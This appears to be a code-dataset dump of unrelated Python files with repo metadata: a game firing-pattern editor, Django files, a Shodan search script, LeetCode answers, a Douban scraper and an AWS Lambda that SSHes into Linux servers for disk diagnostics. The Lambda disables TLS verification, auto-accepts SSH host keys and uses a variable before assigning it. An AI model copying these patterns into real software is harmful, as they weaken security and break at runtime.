path_changes(picture_names, parent_dic, child_dic_R, R_original_pic_paths, init_size=(1024, 1110))
|
[
"ice.choco.pudding.kokoro@gmail.com"
] |
ice.choco.pudding.kokoro@gmail.com
|
1c7d4a57163cafb2d66c7657345ef2dfc466f870
|
1c37991316f22c4b804d2ca2232fc6335539e38a
|
/venv/Scripts/easy_install-3.5-script.py
|
3ddd10162ea5ec8975c5d83a34be3c6066075ef0
|
[] |
no_license
|
DUTZXD/MLHW2
|
363846b0e11bd4a8711d8393ff8a3f8efb4a4736
|
c85f3abc264bbfcf18ba4922587395c776a516b9
|
refs/heads/master
| 2022-10-20T10:22:27.704358
| 2020-06-10T00:02:30
| 2020-06-10T00:02:30
| 270,972,394
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 446
|
py
|
#!"F:\Pycharm Project\MLHW2\venv\Scripts\python.exe"
# EASY-INSTALL-ENTRY-SCRIPT: 'setuptools==40.8.0','console_scripts','easy_install-3.5'
__requires__ = 'setuptools==40.8.0'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('setuptools==40.8.0', 'console_scripts', 'easy_install-3.5')()
)
|
[
"951383631@qq.com"
] |
951383631@qq.com
|
2a2a8d2c438b23ca394b6ff90b091b17dfba1f5b
|
78a63d44d841b92fe501bfcadb2fa350077ed405
|
/modRelation/api/serializers.py
|
824e443a5c626bf9697a2d0742d390b81c0fd3fb
|
[] |
no_license
|
rmnkarkey/Django-Api
|
27513a81359ca35d46ab2c5e2a77edd5d3c2561e
|
30d640b18e7e5a7025020d3e8477b7cdd1196ded
|
refs/heads/master
| 2020-04-03T16:59:19.950310
| 2018-10-30T17:22:13
| 2018-10-30T17:22:13
| 155,427,361
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 353
|
py
|
from modRelation.models import Reporter,Article
from rest_framework import serializers
class modelsSerializers(serializers.ModelSerializer):
class Meta:
model=Reporter
fields=('id','first_name','last_name','email')
class AotherSerializer(serializers.ModelSerializer):
class Meta:
model=Article
fields=('id','headline','pub_date','reporter')
|
[
"rk.officialuser@gmail.com"
] |
rk.officialuser@gmail.com
|
3259d6d8dbe83bc7bd9396a0f051510a2dc63971
|
32911eab1e039fbba653af3d0e69005c0c3b5ec2
|
/main/main.py
|
5618fff4d2cf9e9ec37a070390e7092695139976
|
[] |
no_license
|
juso40/BL2FiringPatternEditor
|
e4a88e966f5f8f5a4133933f8ea6afec1f84f3b6
|
3aa7fe00203dfdf108f94fa2707e6304a412006f
|
refs/heads/master
| 2022-08-31T10:24:52.830769
| 2020-05-18T22:41:40
| 2020-05-18T22:41:40
| 264,648,607
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,759
|
py
|
import pygame
from copy import deepcopy
def export(points, screen_mid):
points = deepcopy(points)
p_line = "(StartPoint=(Pitch={pitch},Yaw={yaw},Roll=0),EndPoint=(Pitch=0,Yaw=0,Roll=0)," \
"bUseStartPointOnly=True," \
"CustomWaveMotion=(bUseCustomWaveMotion=False,WaveFreq=(X=0.000000,Y=0.000000,Z=0.000000)," \
"WaveAmp=(X=0.000000,Y=0.000000,Z=0.000000),WavePhase=(X=0.000000,Y=0.000000,Z=0.000000))),"
with open("exportedFiringPattern.txt", "w+") as f:
f.write("set FiringModeDefinition FiringPatternLines (")
for point in points:
point.x -= screen_mid.x
point.y = screen_mid.y - point.y
f.write(p_line.format(pitch=int(point.y * 20), yaw=int(point.x * 20)))
f.seek(f.tell() - 1)
f.write(")")
str_help = "LMB: New Point RMB: Remove last Point G: Toggle trough Grids X/Y: Clone on X/Y axis Enter: Save to " \
"'exportedFiringPattern.txt'"
pygame.init()
pygame.display.set_caption("BL Firing Pattern Editor")
black = (0, 0, 0)
white = (255, 255, 255)
grey = (190, 190, 190)
light_blue = (100, 100, 155)
red = (255, 0, 0)
green = (0, 255, 0)
blue = (0, 0, 255)
X, Y = 1280, 720
grids = ((1, 1), (16, 9), (32, 18), (64, 36))
curr_grid = 0
display_surface = pygame.display.set_mode((X, Y))
image = pygame.transform.scale(pygame.image.load("BL2FiringPatternBG.png"), display_surface.get_rect()[2:])
my_font = pygame.font.SysFont("Arial.ttf", 24)
help_text = my_font.render(str_help, True, green)
help_text_bg = my_font.render(str_help, True, black)
middle = pygame.Vector2(display_surface.get_rect()[2] / 2, display_surface.get_rect()[3] / 2)
clock = pygame.time.Clock()
pattern_points = [] # store our Vector2 of pattern points
b_clone_y = False
b_clone_x = False
b_snap = False
while True:
display_surface.blit(image, (0, 0))
# show grid
for x in range(0, X, X // grids[curr_grid][0]):
pygame.draw.line(display_surface, light_blue, (x, 0), (x, Y))
for y in range(0, Y, Y // grids[curr_grid][1]):
pygame.draw.line(display_surface, light_blue, (0, y), (X, y))
# show x/y help lines if needed
if b_clone_x:
pygame.draw.line(display_surface, green, (0, Y // 2), (X, Y // 2))
if b_clone_y:
pygame.draw.line(display_surface, blue, (X // 2, 0), (X // 2, Y))
# Display our help text
display_surface.blit(help_text_bg, (1, 0))
display_surface.blit(help_text_bg, (-1, 0))
display_surface.blit(help_text_bg, (0, 1))
display_surface.blit(help_text_bg, (0, -1))
display_surface.blit(help_text, (0, 0))
# mid crosshair
pygame.draw.line(display_surface, red, middle, (middle.x, middle.y + 20), 1)
pygame.draw.line(display_surface, red, middle, (middle.x, middle.y - 20), 1)
pygame.draw.line(display_surface, red, middle, (middle.x + 20, middle.y), 1)
pygame.draw.line(display_surface, red, middle, (middle.x - 20, middle.y), 1)
for event in pygame.event.get():
if event.type == pygame.QUIT:
pygame.quit()
quit()
elif event.type == pygame.MOUSEBUTTONUP and event.button == 3: # Right click remove last point
if pattern_points:
pattern_points.pop()
elif event.type == pygame.MOUSEBUTTONUP and event.button == 1: # Left click add new point
pos = pygame.Vector2(*pygame.mouse.get_pos())
# calc optional snap location
if b_snap and curr_grid > 0:
# Ill keep this as an optional ToDo :)
pass
pattern_points.append(pos)
if b_clone_y and b_clone_x:
new_pos = pygame.Vector2()
if pos.x > middle.x:
new_pos.x = (middle.x - (pos.x - middle.x))
elif pos.x < middle.x:
new_pos.x = (middle.x + (middle.x - pos.x))
if pos.y > middle.y:
new_pos.y = (middle.y - (pos.y - middle.y))
elif pos.y < middle.y:
new_pos.y = (middle.y + (middle.y - pos.y))
pattern_points.append(new_pos)
elif b_clone_y:
if pos.x > middle.x:
pattern_points.append(pygame.Vector2(middle.x - (pos.x - middle.x), pos.y))
elif pos.x < middle.x:
pattern_points.append(pygame.Vector2(middle.x + (middle.x - pos.x), pos.y))
elif b_clone_x:
if pos.y > middle.y:
pattern_points.append(pygame.Vector2(pos.x, (middle.y - (pos.y - middle.y))))
elif pos.y < middle.y:
pattern_points.append(pygame.Vector2(pos.x, (middle.y + (middle.y - pos.y))))
elif event.type == pygame.KEYUP:
if event.key == pygame.K_RETURN: # Export all the current points to txt
export(pattern_points, middle)
elif event.key == pygame.K_g:
curr_grid = (curr_grid + 1) % len(grids)
elif event.key == pygame.K_y or event.key == pygame.K_z:
b_clone_y = not b_clone_y
elif event.key == pygame.K_x:
b_clone_x = not b_clone_x
elif event.key == pygame.K_s:
b_snap = not b_snap
# Draw our pattern points
for point in pattern_points:
pygame.draw.line(display_surface, white, point, (point.x, point.y + 5), 1)
pygame.draw.line(display_surface, white, point, (point.x, point.y - 5), 1)
pygame.draw.line(display_surface, white, point, (point.x + 5, point.y), 1)
pygame.draw.line(display_surface, white, point, (point.x - 5, point.y), 1)
# update our screen
clock.tick(30)
pygame.display.flip()
|
[
"justin.sostmann@googlemail.com"
] |
justin.sostmann@googlemail.com
|
ce077575cd036ba0e120e0d021597f7c91824a8c
|
d692146094664ee7affd3c20664f7493ec4edd93
|
/shodan-monitor.py
|
b1e9e3212d68ddae7c046e44bbfcc97c713105ad
|
[] |
no_license
|
happostroph/shodan-monitor
|
be1c775fd69fdb5614365986733d425dc00136d6
|
ff500423c60b6edc13e89df7162a4b7adf696424
|
refs/heads/master
| 2020-09-25T17:06:33.131424
| 2019-12-05T11:22:22
| 2019-12-05T11:22:22
| 226,050,381
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 506
|
py
|
import shodan
import os
SHODAN_API_KEY = os.environ.get("SHODAN_API_KEY")
api = shodan.Shodan(SHODAN_API_KEY)
query = ""
try:
# Search Shodan
results = api.search(query)
# Show the results
print('Results found: {}'.format(results['total']))
for result in results['matches']:
print('IP: {}'.format(result['ip_str']))
print('Open port: {}'.format(result['port']))
except shodan.APIError as err :
print('Error: {}'.format(err))
|
[
"maxime.neuville@viacesi.fr"
] |
maxime.neuville@viacesi.fr
|
7476c30898cb71816f6f69ab81cf15673391f27d
|
99e6430dcdf0ed64b2501b3faab4dbbfee73b245
|
/projects/migrations/0002_auto_20170430_1206.py
|
59c651455daa4647da9ef970aed038fb5ed8f50e
|
[] |
no_license
|
Shriram-N/social-app-django
|
63df2d40f0675e6ca55a044aec267dd04b2f3a25
|
321f5bfc3584d5a45bf7ff42c1892987ab1d394f
|
refs/heads/master
| 2021-01-20T07:48:22.763833
| 2017-05-02T15:07:34
| 2017-05-02T15:07:34
| 90,046,663
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 489
|
py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
from django.conf import settings
class Migration(migrations.Migration):
dependencies = [
('projects', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='projects',
name='creator',
field=models.ForeignKey(to=settings.AUTH_USER_MODEL, null=True),
preserve_default=True,
),
]
|
[
"shreeram51091@gmail.com"
] |
shreeram51091@gmail.com
|
34a7d81b8fedbc037428cff8816bbb4e0e284f73
|
c4b607b5d777ce58303ebbff6acfa9337a9f3f52
|
/ex04/ran_langd.py
|
d798a45454e3f8e00caf127fa277b14094d6c5ee
|
[] |
no_license
|
Ran4/dd1331-public
|
ee30f64809f2f34e68c3541c33ee2fd5a951a7bd
|
f15f94254d89735b052f7eba2d58c6b0c4923dd8
|
refs/heads/master
| 2020-04-18T18:27:35.432204
| 2016-10-03T18:06:20
| 2016-10-03T18:06:20
| 66,838,114
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 84
|
py
|
def length(seq):
if not seq:
return 0
return 1 + length(seq[1:])
|
[
"rasmus.ansin@gmail.com"
] |
rasmus.ansin@gmail.com
|
948a686715d703467866c5599a5c5afdc1c4cdf9
|
dd2fd93032421157319f96bd42906bc7f80e999c
|
/httpx_cli/_help.py
|
ce9e07ed3f00f9f0b524621a5916491ccc105300
|
[] |
no_license
|
steven-howa/httpx-cli
|
aa197e0e6d689717e0ca552dff0ccd1d14bdb3a9
|
129db30a7e211b249690ee3d31fae0fee5a0aa6d
|
refs/heads/master
| 2022-12-19T20:38:17.334774
| 2020-09-25T10:17:15
| 2020-09-25T10:17:15
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,752
|
py
|
from rich.console import Console
from rich.table import Table
def print_help() -> None:
console = Console()
console.print("[bold]HTTPX :butterfly:", justify="center")
console.print()
console.print("A next generation HTTP client.", justify="center")
console.print()
console.print("Usage: [bold]httpx[/bold] [cyan]<URL> ...[/cyan] ", justify="left")
console.print()
table = Table.grid(padding=1, pad_edge=True)
table.add_column("Parameter", no_wrap=True, justify="left", style="bold")
table.add_column("Description")
table.add_row(
"-m, --method [cyan]METHOD",
"Request method, such as GET, POST, PUT, PATCH, DELETE, OPTIONS, HEAD. [Default: GET]",
)
table.add_row(
"-p, --params [cyan]<NAME VALUE> ...",
"Query parameters to include in the request URL.",
)
table.add_row(
"-c, --content [cyan]TEXT", "Byte content to include in the request body."
)
table.add_row(
"-d, --data [cyan]<NAME VALUE> ...", "Form data to include in the request body."
)
table.add_row(
"-f, --files [cyan]<NAME FILENAME> ...",
"Form files to include in the request body.",
)
table.add_row("-j, --json [cyan]TEXT", "JSON data to include in the request body.")
table.add_row(
"-h, --headers [cyan]<NAME VALUE> ...",
"Include additional HTTP headers in the request.",
)
table.add_row(
"--cookies [cyan]<NAME VALUE> ...", "Cookies to include in the request."
)
table.add_row(
"-a, --auth [cyan]<USER PASS>",
"Username and password to include in the request. Specify '-' for the password to use "
"a password prompt. Note that using --verbose/-v will expose the Authorization "
"header, including the password encoding in a trivially reverisible format.",
)
table.add_row(
"--proxy [cyan]URL",
"Send the request via a proxy. Should be the URL giving the proxy address.",
)
table.add_row(
"-t, --timeout [cyan]FLOAT",
"Timeout value to use for network operations, such as establishing the connection, "
"reading some data, etc... [Default: 5.0]",
)
table.add_row("--no-allow-redirects", "Don't automatically follow redirects.")
table.add_row("--no-verify", "Disable SSL verification.")
table.add_row(
"--http2", "Send the request using HTTP/2, if the remote server supports it."
)
table.add_row(
"--download", "Save the response content as a file, rather than displaying it."
)
table.add_row("-v, --verbose", "Verbose output. Show request as well as response.")
table.add_row("--help", "Show this message and exit.")
console.print(table)
|
[
"tom@tomchristie.com"
] |
tom@tomchristie.com
|
d52d3ad533846709d2d0bfadb07a750fe00f9d02
|
09630fcab1b1c4739010a389438bf174182fa42e
|
/Interview Practice/productOfArrayExceptSelf.py
|
abf446977a51c0ddf1d10ef2f0e824f3506e3301
|
[] |
no_license
|
zanewebb/codebreakerspractice
|
1e28bd6b9c1f78fd5306784848edfb5dd746e235
|
e8e2834f8edcd8c9732be603b0b6038c8fd88fa0
|
refs/heads/master
| 2021-04-23T03:17:40.229930
| 2020-10-07T02:11:14
| 2020-10-07T02:11:14
| 249,893,478
| 0
| 0
| null | 2020-06-22T21:34:05
| 2020-03-25T05:20:35
|
Python
|
UTF-8
|
Python
| false
| false
| 1,945
|
py
|
# so close, shouldnt have tried setting the intial rolling prod to a value other than 1
class Solution:
def productExceptSelf(self, nums: List[int]) -> List[int]:
if len(nums) <= 1:
return nums
output = [0] * len(nums)
output[0] = 1
for i in range(1,len(nums)):
output[i] = nums[i-1] * output[i-1]
rollingprod = 1
for i in range(len(nums)-1, -1, -1):
output[i] *= rollingprod
rollingprod *= nums[i]
return output
# approved answer
# the trick is to do just two passes, one where you populate each index with the rolling profuct of everything to the left
# second pass keeps track of the rolling product from the right, multiply that into each output index and that should be it
class Solution:
def productExceptSelf(self, nums: List[int]) -> List[int]:
output = [0] * len(nums)
output[0] = 1
for i in range(1, len(nums)):
output[i] = output[i-1]*nums[i-1]
rollingprod = 1
for i in range(len(nums)-1, -1, -1):
output[i] = output[i] * rollingprod
rollingprod *= nums[i]
return output
# PLEASE NOTE THAT THIS SOLUTION IS INVALID
# ONE REQUIREMENT OF THIS PROBLEM IS THAT IT MUST BE O(N), THIS IS O(N^2)
# MUST NOT USE DIVISION TO SOLVE THIS
class Solution:
def productExceptSelf(self, nums: List[int]) -> List[int]:
output = [None]*len(nums)
rollingprod = 1
for i in range(0, len(nums)):
tempprod = 1
for j in range(i+1, len(nums)):
if j < len(nums):
tempprod *= nums[j]
output[i] = tempprod * rollingprod
rollingprod *= nums[i]
return output
|
[
"zane.webb97@gmail.com"
] |
zane.webb97@gmail.com
|
926c9d597e451bbae91d1f4dfc0b1fac5892ff2b
|
fda2fb357f0138140e98346f0a37b15a81a01093
|
/DiskSpace_Linux.py
|
3b567e46701347df2f8c80f9f9206adfe285ec2d
|
[] |
no_license
|
Ashwini1001/AutoDesk-Projects
|
de6b7d2314f246560ed95cdc56255c6efc713e9a
|
b4eb9fcab1dfdb6482ea06b9895c48edda540bfb
|
refs/heads/master
| 2020-04-04T18:22:43.618456
| 2018-11-05T04:36:51
| 2018-11-05T04:36:51
| 156,161,271
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 11,195
|
py
|
import paramiko, socket, os, boto3, json, requests,base64,pysnow,logging,inspect,warnings,substring
from paramiko import SSHException
from BeautifulSoup import BeautifulSoup
from base64 import b64decode
from requests.auth import HTTPBasicAuth
def Credentials():
try:
ENCRYPTED = os.environ['ssurl']
ssurl = boto3.client('kms').decrypt(CiphertextBlob=b64decode(ENCRYPTED))['Plaintext']
ENCRYPTED = os.environ['ssgetsec']
ssgetsec = boto3.client('kms').decrypt(CiphertextBlob=b64decode(ENCRYPTED))['Plaintext']
ENCRYPTED = os.environ['suser']
suser = boto3.client('kms').decrypt(CiphertextBlob=b64decode(ENCRYPTED))['Plaintext']
ENCRYPTED = os.environ['spass']
spass = boto3.client('kms').decrypt(CiphertextBlob=b64decode(ENCRYPTED))['Plaintext']
ENCRYPTED = os.environ['Snowinstance']
Snowinstance = boto3.client('kms').decrypt(CiphertextBlob=b64decode(ENCRYPTED))['Plaintext']
ENCRYPTED = os.environ['sid']
sid = boto3.client('kms').decrypt(CiphertextBlob=b64decode(ENCRYPTED))['Plaintext']
ENCRYPTED = os.environ['snsid']
snsid = boto3.client('kms').decrypt(CiphertextBlob=b64decode(ENCRYPTED))['Plaintext']
headers = {
"Content-Type": "application/x-www-form-urlencoded"
}
creds = {
"username": suser,
"password": spass,
"organization": "",
"domain": "ads"
}
resp = requests.post(ssurl, data=creds, headers=headers, verify=False)
sresp = resp.content
Soup = BeautifulSoup
soup = Soup(sresp)
token = soup.find('token').string
secret = {
"secretId": sid,
"token": token
}
s = requests.post(ssgetsec, data=secret, headers=headers, verify=False)
strs = s.content
soup = Soup(strs)
username = soup.findAll("value")
i = 0
for user in username:
if i == 0:
i = i + 1
elif i <= 2:
strval = user.string
if "svc" in strval:
cuser = strval
else:
cpwd = strval
i = i + 1
snowresp = requests.post(ssurl, data=creds, headers=headers, verify=False)
ssnowresp = snowresp.content
Soup1 = BeautifulSoup
soup1 = Soup1(ssnowresp)
snowtoken = soup1.find('token').string
snowsecret = {
"secretId": snsid,
"token": snowtoken
}
snowurl = requests.post(ssgetsec, data=snowsecret, headers=headers, verify=False)
strsnowurl = snowurl.content
soup1 = Soup(strsnowurl)
SnowUsername = soup1.findAll("value")
i = 0
for u in SnowUsername:
if i == 0:
i = i + 1
elif i <= 2:
SnowString = u.string
if "svc" in SnowString:
snowuser = SnowString
else:
snowpwd = SnowString
i = i + 1
return cuser,cpwd,snowuser,snowpwd,Snowinstance
except Exception as e:
logging.warning("Warning at Credentials()...!" + str(e))
def SSHSession(IpAddress):
cuser,cpwd,snowuser,snowpwd,Snowinstance = Credentials()
try:
LinuxInstance = paramiko.SSHClient()
LinuxInstance.set_missing_host_key_policy(paramiko.AutoAddPolicy())
LinuxInstance.connect(hostname = IpAddress, username = cuser, password = cpwd)
return LinuxInstance
LinuxInstance.close()
except paramiko.ssh_exception.NoValidConnectionsError:
print "IP does not belong to linux"
print "Message: Bot execution failed"
except paramiko.ssh_exception.AuthenticationException:
print "Authentication Error! Invalid username/password..."
print "Message: Bot execution failed"
except paramiko.ssh_exception.SSHException:
print "Unable to SSH! ..."
print "Message: Unable to initiate SSH"
def MainMethod(IpAddress, cmd ):
''' Status of the Method is to get the top five process names '''
try:
stdin, stdout, stderr = SSHSession(IpAddress).exec_command(cmd)
Output = stdout.read().decode('ascii').strip("\n")
return Output
except AttributeError:
print "Unable to execute commands..!"
print "Message: Bot execution failed"
except SSHException:
print "SSH session is not active..!"
print "Message: Bot execution failed"
def lambda_handler(event, context):
'''Method to run commands'''
cuser,cpwd,snowuser,snowpwd,Snowinstance = Credentials()
print event
Des = []
for alert in (event.get("incident")).get("alerts"):
for tag in (alert.get("tags")):
if tag.get("name") == "ip":
EventIpAddress = tag.get("value").encode("utf-8")
print "The ip is:", EventIpAddress
for alert in (event.get("incident")).get("alerts"):
for tag in (alert.get("tags")):
if tag.get("name") == "host":
HostName = tag.get("value").encode("utf-8")
print "The hostname is:", HostName
for alert in (event.get("incident")).get("alerts"):
for tag in (alert.get("tags")):
if tag.get("name") == "short_description":
ShortDescription = tag.get("value").encode("utf-8")
print "The short description is:", ShortDescription
path = substring.substringByChar(ShortDescription, startChar="/", endChar=" ")
print "The path is:", path
if (event.get("incident")["changedOn"]) == (event.get("incident")["startedOn"]):
SnowSysId = event.get("shareResults").get("servicenowSysId")
print SnowSysId
else:
for result in (((event.get("shareResults")).get("result"))):
SnowSysId = (result).get("sys_id").encode("utf-8")
print SnowSysId
Disk = []; File = [];WorkState = [];CollectorOutput = [];SNMP = []; ReadOnlyStatusInfo = []
''' Method to get the Linux Version '''
LinuxVersion = MainMethod(EventIpAddress, "cat /etc/redhat-release")
''' Method to get overall disk status '''
OverallDiskStatus = MainMethod(EventIpAddress, "df -h | sort -hr | head -n 10")
''' Method is to get disk status pertaining to the path'''
DiskStatus = MainMethod(EventIpAddress, "df -h " + path + " | sort -hr | head -n 10")
''' Status of the Method is to get the top five process names '''
LargeFiles = MainMethod(EventIpAddress, "ls -lh " + path + " | sort -hr | head -n 3" )
''' Method to get list of open files '''
ListOfOpenFiles = MainMethod(EventIpAddress, "/usr/sbin/lsof " + path)
''' Method to get disk I/O information '''
DiskInfo = MainMethod(EventIpAddress,"iostat | head -n 20")
'''*********************HEALTHCHECK**********************'''
RoutingTable = MainMethod(EventIpAddress, "netstat -r")
stdin, stdout, stderr = SSHSession(EventIpAddress).exec_command("awk '$4 ~ " + "^ro" + "&& $3 !~ " + "(squashfs|iso9660|nfs|cifs|tmpfs|sysfs)" + "{print $0}' /proc/mounts")
ReadOnlylines = stdout.readlines()
if ReadOnlylines == []:
ReadOnlyStatus = "No read-only file information"
ReadOnlyStatusInfo.append(ReadOnlyStatus)
else:
ReadOnlyStatusInfo.append(FileInfo)
TcpConnection = MainMethod(EventIpAddress, "netstat -t --listening")
FileInfo = MainMethod(EventIpAddress, "awk '$4 ~ " + "^ro" + "&& $3 !~ " + "(squashfs|iso9660|nfs|cifs|tmpfs|sysfs)" + "{print $0}' /proc/mounts")
ZombieProcessList = MainMethod(EventIpAddress, "ps aux | grep Z | grep -vE " + '"grep|ps aux"')
InodeInfo = MainMethod(EventIpAddress, "df -i")
MemInfo = MainMethod(EventIpAddress, "free -m")
SwapInfo = MainMethod(EventIpAddress, "/sbin/swapon --summary")
RebootInfo = MainMethod(EventIpAddress, "last reboot | head -3")
ShutdownInfo = MainMethod(EventIpAddress, "last -x | grep shutdown | head -3")
CpuInfo = MainMethod(EventIpAddress, "ps -eo pcpu,pid,user,args | sort -k 1 -r | head -6")
'''Comments to be updated'''
LinuxVer = "The linux version is :" + '\r\n ' + LinuxVersion
Overall = "The overall disk status is:" + '\r\n' + OverallDiskStatus
Disk = "The disk status information pertaining to the path is :" + '\r\n' + DiskStatus
Large = "The list of files consuming more space is :" + '\r\n' + LargeFiles
OpenFiles = "The list of open files in the directory is :" + '\r\n' + ListOfOpenFiles
DiskInf = "The disk I/O information is : " + '\r\n ' + DiskInfo
RoutingTableInfo = "The routing table information is:" + '\r\n' + RoutingTable
TcpConnectionInfo = "The active tcp connections are :" + '\r\n' + TcpConnection
FileInformation = "The read-only file information is:" + '\r\n' + ("\n".join(ReadOnlyStatusInfo))
DiskInformation = "The disk information is:" + '\r\n' + DiskInfo
ZombieInformation = "The zombie process information is:" + '\r\n' + ZombieProcessList
InodeInforation = "The inode information is :" + '\r\n' + InodeInfo
MemoryInformation = "The memory information is :" + '\r\n' + MemInfo
SwapInformation = "The swap information is :" + '\r\n' + SwapInfo
RebootInformation = "The last reboot information is :" + '\r\n' + RebootInfo
ShutdownInformation = "The shutdown information is :" + '\r\n' + ShutdownInfo
Top5Cpu = "The top 5 processes consuming memory is :" + '\r\n' + CpuInfo
comments = LinuxVer + '\r\n'*2 + Overall + '\r\n'*2 + Disk + '\r\n'*2 + Large + '\r\n'*2 + OpenFiles + '\r\n'*4 + DiskInf + '\r\n'*2 + "HEALTHCHECK" + '\r\n'*2 + RoutingTableInfo + '\r\n'*2 + TcpConnectionInfo + '\r\n'*2 + FileInformation + '\r\n'*2 + DiskInformation + '\r\n'*2 + ZombieInformation + '\r\n'*2 +InodeInforation + '\r\n'*2 + MemoryInformation + '\r\n'*2 + SwapInformation + '\r\n'*2 + RebootInformation + '\r\n'*2 + ShutdownInformation + '\r\n'*2 + Top5Cpu
print comments
connect_to_snow = pysnow.Client(instance = Snowinstance, user = snowuser, password = snowpwd)
incident = connect_to_snow.resource(api_path='/table/incident')
response = incident.get(query={'sys_id': SnowSysId})
update = response.update({'comments': comments})
update = response.update({'assignment_group': 'DES Unix Operations'})
update = response.update({'assigned_to': 'Autobots'})
update = response.update({'incident_state': 'Awaiting Assignment'})
update = response.update({'assigned_to': 'Open'})
if True:
print "Update on SNOW successful!"
print "Message: Bot executed successfully"
else:
print "Update on SNOW not succesful!"
print "Message: Bot execution failed"
|
[
"noreply@github.com"
] |
Ashwini1001.noreply@github.com
|
afc6f056f049b0bd214ece662c0a08b2cf31852f
|
c7a4c41aa2d2ab17840f6fd8d46ca00c10062f93
|
/豆瓣电视剧_分页.py
|
98562a3b15f68a2ac1e691078280f48f416fd12e
|
[] |
no_license
|
pythonhqw/douban
|
e56e8a58f1b4075698fc8ce6cb643d44d833f121
|
47539dc9f8b9a086a837cf000d8f92bf3b0bdee8
|
refs/heads/master
| 2020-03-19T13:27:59.370307
| 2018-06-20T08:58:23
| 2018-06-20T08:58:23
| 136,580,752
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,520
|
py
|
import requests
import json
class DouBanDSJSpider(object):
def __init__(self):
# 准备数据
# 请求url
self.url = 'https://m.douban.com/rexxar/api/v2/subject_collection/filter_tv_{}_hot/items?start={}&count=18&loc_id=108288'
# 请求头
# Referer 是随着电视剧的分类而变化的
# 国产剧:chinese 港剧:hongkong 动漫:animation
self.headers = {
'Referer': '',
'User-Agent': 'Mozilla/5.0 (Linux; Android 5.0; SM-G900P Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Mobile Safari/537.36',
}
def get_data_from_url(self, url, ref_cg):
self.headers['Referer'] = ref_cg
response = requests.get(url, headers=self.headers)
return response.content
def get_dsj_list(self, json_str):
dic = json.loads(json_str.decode())
start = dic['start']
count = dic['count']
total = dic['total']
next_start = start + count
return dic['subject_collection_items'], next_start, total
def save_dsj_list(self, dsj_list):
with open("dsj_list.txt", 'a', encoding='utf8') as f:
for dsj in dsj_list:
json.dump(dsj, f, ensure_ascii=False)
f.write("\n")
def main(self, next_start, cg, category, url_category):
# 发起请求,获取响应参数
url = self.url.format(cg, next_start)
ref_cg = category[url_category.index(cg)]
json_str = self.get_data_from_url(url, ref_cg)
# 解析数据
dsj_list, next_start, total = self.get_dsj_list(json_str)
# print(dsj_list)
# 存储电视剧列表到文件里
self.save_dsj_list(dsj_list)
return next_start, total
def run(self):
# 准备要获取的电视剧类别
category = ['https://m.douban.com/tv/chinese', 'https://m.douban.com/tv/tvshow', 'https://m.douban.com/tv/animation']
url_category = ['domestic', 'variety', 'animation']
for cg in url_category:
next_start = 0
while next_start is not None:
next_start, total = self.main(next_start, cg, category, url_category)
print(next_start, total)
if next_start >= total:
with open("dsj_list.txt", 'a') as f:
f.write('\n')
next_start = None
if __name__ == '__main__':
dsjs = DouBanDSJSpider()
dsjs.run()
|
[
"xwp_fullstack@163.com"
] |
xwp_fullstack@163.com
|
1bb86785857a570e1bec4dab789b1c0965b51f50
|
937db7fa80f582a2bdb44879c89dde87ffc8e7d1
|
/chefvendor/wsgi.py
|
00810a16fe44f00d53bf954931a21e6228975a1c
|
[] |
no_license
|
labanyamukhopadhyay/KitchenExpress
|
6a261cbf3036831c856a9099c3c98ad245a8ccca
|
c48f3232c65e62690c6b0ecb83f4cbf2627c0470
|
refs/heads/master
| 2022-12-07T11:49:21.371799
| 2020-08-19T20:12:25
| 2020-08-19T20:12:25
| 288,824,269
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 171
|
py
|
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'chefvendor.settings')
application = get_wsgi_application()
|
[
"labanyam@hotmail.com"
] |
labanyam@hotmail.com
|
cd883a6a4424907b7c7dbe14fe6e5f929f954797
|
356ccad5492f6ce76b71bd27543780de773cd093
|
/recursion.py
|
31f43e9b27dc71f7cc954d21a35ccbad8b39a460
|
[] |
no_license
|
nanogoga/Porno
|
b437cb5bc002b5b1ad6a494dd90c8b14a139f6ec
|
09dbc325a6b9b95b6a9d32e0623da351aa4bd829
|
refs/heads/master
| 2020-05-30T10:28:42.052737
| 2019-06-01T00:41:27
| 2019-06-01T00:41:27
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 237
|
py
|
def factorial(num):
if num == 1 or num == 0:
return 1
elif num < 0:
raise ValueError(f'no existe el factorial'
f'para {num}'
)
return num * factorial(num - 1)
|
[
"ingenieria@uniempresarial.local"
] |
ingenieria@uniempresarial.local
|
37455a871cc701a2f49cbc15837a86ed47ae1ba2
|
7d274ce8dae971228a23157a409b561020c22f66
|
/tools/packages/SCons/Node/Python.py
|
ef66c3c3e28134bf680d50447f46ac8437a4f6ac
|
[] |
no_license
|
Eigenlabs/EigenD-Contrib
|
a212884d4fdf9ae0e1aeb73f6311606212e02f94
|
586fe17471571802295c792697f255e6cab51b17
|
refs/heads/master
| 2020-05-17T07:54:48.668925
| 2013-02-05T10:20:56
| 2013-02-05T10:20:56
| 3,239,072
| 3
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,220
|
py
|
"""scons.Node.Python
Python nodes.
"""
#
# Copyright (c) 2001, 2002, 2003, 2004, 2005, 2006, 2007, 2008, 2009 The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
